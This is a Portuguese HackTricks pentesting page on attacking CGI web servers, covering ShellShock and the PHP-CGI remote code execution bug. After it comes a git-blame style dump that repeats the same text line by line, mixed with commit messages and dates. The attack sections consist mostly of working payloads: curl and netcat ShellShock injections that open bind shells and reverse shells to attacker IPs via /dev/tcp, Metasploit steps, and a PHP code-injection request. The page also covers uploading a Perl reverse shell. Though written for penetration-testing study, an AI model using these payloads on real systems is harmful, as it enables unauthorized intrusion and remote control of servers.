hacktricks/network-services-pentesting/pentesting-web/cgi.md

<details>

<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Outras maneiras de apoiar o HackTricks:

* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.

</details>


# Informação

Os **scripts CGI são scripts perl**, então, se você comprometeu um servidor que pode executar scripts _**.cgi**_ você pode **fazer upload de um shell reverso perl** \(`/usr/share/webshells/perl/perl-reverse-shell.pl`\), **alterar a extensão** de **.pl** para **.cgi**, dar **permissões de execução** \(`chmod +x`\) e **acessar** o shell reverso **pelo navegador web** para executá-lo.
Para testar **vulnerabilidades CGI** é recomendado usar `nikto -C all` \(e todos os plugins\)

# **ShellShock**

**ShellShock** é uma **vulnerabilidade** que afeta o amplamente utilizado shell de linha de comando **Bash** em sistemas operacionais baseados em Unix. Ele visa a capacidade do Bash de executar comandos passados por aplicativos. A vulnerabilidade está na manipulação de **variáveis de ambiente**, que são valores nomeados dinâmicos que impactam como os processos são executados em um computador. Os atacantes podem explorar isso anexando **código malicioso** às variáveis de ambiente, que é executado ao receber a variável. Isso permite que os atacantes potencialmente comprometam o sistema.

Explorando essa vulnerabilidade a **página pode lançar um erro**.

Você poderia **encontrar** essa vulnerabilidade observando que está usando uma **versão antiga do Apache** e **cgi\_mod** \(com pasta cgi\) ou usando **nikto**.

## **Teste**

A maioria dos testes são baseados em ecoar algo e esperar que essa string seja retornada na resposta da web. Se você acha que uma página pode ser vulnerável, procure todas as páginas cgi e teste-as.

**Nmap**
```bash
nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
```
## **Curl \(refletido, cego e out-of-band\)**
```bash
# Reflected
curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' http://10.1.2.32/cgi-bin/admin.cgi 2>/dev/null| grep 'VULNERABLE'
# Blind with sleep (you could also make a ping or web request to yourself and monitor that oth tcpdump)
curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"' http://10.11.2.12/cgi-bin/admin.cgi
# Out-Of-Band Use Cookie as alternative to User-Agent
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http://10.10.10.10/cgi-bin/user.sh
```
[**Shellsocker**](https://github.com/liamim/shellshocker)
```bash
python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi
```
## Exploração
```bash
#Bind Shell
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 8
#Reverse shell
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.159.1 443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 80
#Reverse shell using curl
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' http://10.1.2.11/cgi-bin/admin.cgi
#Reverse shell using metasploit
> use multi/http/apache_mod_cgi_bash_env_exec
> set targeturi /cgi-bin/admin.cgi
> set rhosts 10.1.2.11
> run
```
# **Proxy \(MitM para solicitações de servidor Web\)**

CGI cria uma variável de ambiente para cada cabeçalho na solicitação http. Por exemplo: "host:web.com" é criado como "HTTP\_HOST"="web.com"

Como a variável HTTP\_PROXY pode ser usada pelo servidor web. Tente enviar um **cabeçalho** contendo: "**Proxy: &lt;IP\_atacante&gt;:&lt;PORTA&gt;**" e se o servidor realizar alguma solicitação durante a sessão. Você poderá capturar cada solicitação feita pelo servidor.

# **PHP Antigo + CGI = RCE \(CVE-2012-1823, CVE-2012-2311\)**

Basicamente, se o cgi estiver ativo e o php for "antigo" \(&lt;5.3.12 / &lt; 5.4.2\), você pode executar código.
Para explorar essa vulnerabilidade, você precisa acessar algum arquivo PHP do servidor web sem enviar parâmetros \(especialmente sem enviar o caractere "="\).
Em seguida, para testar essa vulnerabilidade, você poderia acessar, por exemplo, `/index.php?-s` \(observe o `-s`\), e o **código-fonte da aplicação aparecerá na resposta**.

Então, para obter **RCE**, você pode enviar esta consulta especial: `/?-d allow_url_include=1 -d auto_prepend_file=php://input` e o **código PHP** a ser executado no **corpo da solicitação.
Exemplo:**
```bash
curl -i --data-binary "<?php system(\"cat /flag.txt \") ?>" "http://jh2i.com:50008/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"
```
**Mais informações sobre a vulnerabilidade e possíveis exploits:** [**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/)**,** [**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823)**,** [**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311)**,** [**Exemplo de CTF Writeup**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.**


<details>

<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Outras formas de apoiar o HackTricks:

* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.

</details>
Translated ['network-services-pentesting/pentesting-printers/README.md', 2024-01-08 12:05:12 +00:00			`<details>`

Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:20:49 +00:00			`<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Translated ['network-services-pentesting/pentesting-printers/README.md', 2024-01-08 12:05:12 +00:00
Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:20:49 +00:00			`Outras maneiras de apoiar o HackTricks:`
Translated ['network-services-pentesting/pentesting-printers/README.md', 2024-01-08 12:05:12 +00:00
Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:20:49 +00:00			`* Se você quiser ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF Confira os [PLANOS DE ASSINATURA](https://github.com/sponsors/carlospolop)!`
			`* Adquira o [swag oficial PEASS & HackTricks](https://peass.creator-spring.com)`
Translated ['network-services-pentesting/pentesting-printers/README.md', 2024-01-08 12:05:12 +00:00			`* Descubra [A Família PEASS](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:20:49 +00:00			`* Junte-se ao 💬 [grupo Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo telegram](https://t.me/peass) ou siga-me no Twitter 🐦 [@carlospolopm](https://twitter.com/carlospolopm).`
			`* Compartilhe seus truques de hacking enviando PRs para os [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.`
Translated ['network-services-pentesting/pentesting-printers/README.md', 2024-01-08 12:05:12 +00:00
			`</details>`


Translated to Portuguese 2023-06-06 18:56:34 +00:00			`# Informação`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:20:49 +00:00			Os scripts CGI são scripts perl, então, se você comprometeu um servidor que pode executar scripts _.cgi_ você pode fazer upload de um shell reverso perl \(`/usr/share/webshells/perl/perl-reverse-shell.pl`\), alterar a extensão de .pl para .cgi, dar permissões de execução \(`chmod +x`\) e acessar o shell reverso pelo navegador web para executá-lo.
Translated ['network-services-pentesting/pentesting-printers/README.md', 2024-01-08 12:05:12 +00:00			Para testar vulnerabilidades CGI é recomendado usar `nikto -C all` \(e todos os plugins\)
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
fix mess 2 2022-05-01 12:49:36 +00:00			`# ShellShock`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:20:49 +00:00			ShellShock é uma vulnerabilidade que afeta o amplamente utilizado shell de linha de comando Bash em sistemas operacionais baseados em Unix. Ele visa a capacidade do Bash de executar comandos passados por aplicativos. A vulnerabilidade está na manipulação de variáveis de ambiente, que são valores nomeados dinâmicos que impactam como os processos são executados em um computador. Os atacantes podem explorar isso anexando código malicioso às variáveis de ambiente, que é executado ao receber a variável. Isso permite que os atacantes potencialmente comprometam o sistema.
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:20:49 +00:00			`Explorando essa vulnerabilidade a página pode lançar um erro.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:20:49 +00:00			`Você poderia encontrar essa vulnerabilidade observando que está usando uma versão antiga do Apache e cgi\_mod \(com pasta cgi\) ou usando nikto.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`## Teste`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:20:49 +00:00			`A maioria dos testes são baseados em ecoar algo e esperar que essa string seja retornada na resposta da web. Se você acha que uma página pode ser vulnerável, procure todas as páginas cgi e teste-as.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`Nmap`
			```bash
			`nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi`
			```
Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:20:49 +00:00			`## Curl \(refletido, cego e out-of-band\)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
Update cgi.md 2021-09-24 22:56:32 +00:00			`# Reflected`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' http://10.1.2.32/cgi-bin/admin.cgi 2>/dev/null\| grep 'VULNERABLE'`
Update cgi.md 2021-09-24 22:56:32 +00:00			`# Blind with sleep (you could also make a ping or web request to yourself and monitor that oth tcpdump)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"' http://10.11.2.12/cgi-bin/admin.cgi`
Update cgi.md 2021-09-24 22:56:32 +00:00			`# Out-Of-Band Use Cookie as alternative to User-Agent`
			`curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http://10.10.10.10/cgi-bin/user.sh`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```
fix bad chars 2022-04-05 22:24:52 +00:00			`[Shellsocker](https://github.com/liamim/shellshocker)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi`
			```
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`## Exploração`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`#Bind Shell`
			`$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" \| nc vulnerable 8`
			`#Reverse shell`
			`$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.159.1 443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" \| nc vulnerable 80`
			`#Reverse shell using curl`
			`curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' http://10.1.2.11/cgi-bin/admin.cgi`
			`#Reverse shell using metasploit`
			`> use multi/http/apache_mod_cgi_bash_env_exec`
			`> set targeturi /cgi-bin/admin.cgi`
			`> set rhosts 10.1.2.11`
			`> run`
			```
Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:20:49 +00:00			`# Proxy \(MitM para solicitações de servidor Web\)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:20:49 +00:00			`CGI cria uma variável de ambiente para cada cabeçalho na solicitação http. Por exemplo: "host:web.com" é criado como "HTTP\_HOST"="web.com"`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:20:49 +00:00			`Como a variável HTTP\_PROXY pode ser usada pelo servidor web. Tente enviar um cabeçalho contendo: "Proxy: <IP\_atacante>:<PORTA>" e se o servidor realizar alguma solicitação durante a sessão. Você poderá capturar cada solicitação feita pelo servidor.`
GitBook: [master] 357 pages modified 2020-08-06 14:25:29 +00:00
Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:20:49 +00:00			`# PHP Antigo + CGI = RCE \(CVE-2012-1823, CVE-2012-2311\)`
GitBook: [master] 357 pages modified 2020-08-06 14:25:29 +00:00
Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:20:49 +00:00			`Basicamente, se o cgi estiver ativo e o php for "antigo" \(<5.3.12 / < 5.4.2\), você pode executar código.`
			`Para explorar essa vulnerabilidade, você precisa acessar algum arquivo PHP do servidor web sem enviar parâmetros \(especialmente sem enviar o caractere "="\).`
			Em seguida, para testar essa vulnerabilidade, você poderia acessar, por exemplo, `/index.php?-s` \(observe o `-s`\), e o código-fonte da aplicação aparecerá na resposta.
GitBook: [master] 357 pages modified 2020-08-06 14:25:29 +00:00
Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:20:49 +00:00			Então, para obter RCE, você pode enviar esta consulta especial: `/?-d allow_url_include=1 -d auto_prepend_file=php://input` e o código PHP a ser executado no **corpo da solicitação.
Translated ['network-services-pentesting/pentesting-printers/README.md', 2024-01-08 12:05:12 +00:00			`Exemplo:**`
GitBook: [master] 357 pages modified 2020-08-06 14:25:29 +00:00			```bash
			`curl -i --data-binary "<?php system(\"cat /flag.txt \") ?>" "http://jh2i.com:50008/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"`
			```
Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:20:49 +00:00			`Mais informações sobre a vulnerabilidade e possíveis exploits: [https://www.zero-day.cz/database/337/](https://www.zero-day.cz/database/337/), [cve-2012-1823](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823), [cve-2012-2311](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311), [Exemplo de CTF Writeup](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe).`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00

			`<details>`

Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:20:49 +00:00			`<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['network-services-pentesting/pentesting-printers/README.md', 2024-01-08 12:05:12 +00:00			`Outras formas de apoiar o HackTricks:`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer 2024-02-08 22:20:49 +00:00			`* Se você deseja ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF Confira os [PLANOS DE ASSINATURA](https://github.com/sponsors/carlospolop)!`
			`* Adquira o [swag oficial PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Descubra [A Família PEASS](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Junte-se ao 💬 [grupo Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo telegram](https://t.me/peass) ou siga-me no Twitter 🐦 [@carlospolopm](https://twitter.com/carlospolopm).`
			`* Compartilhe seus truques de hacking enviando PRs para os [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`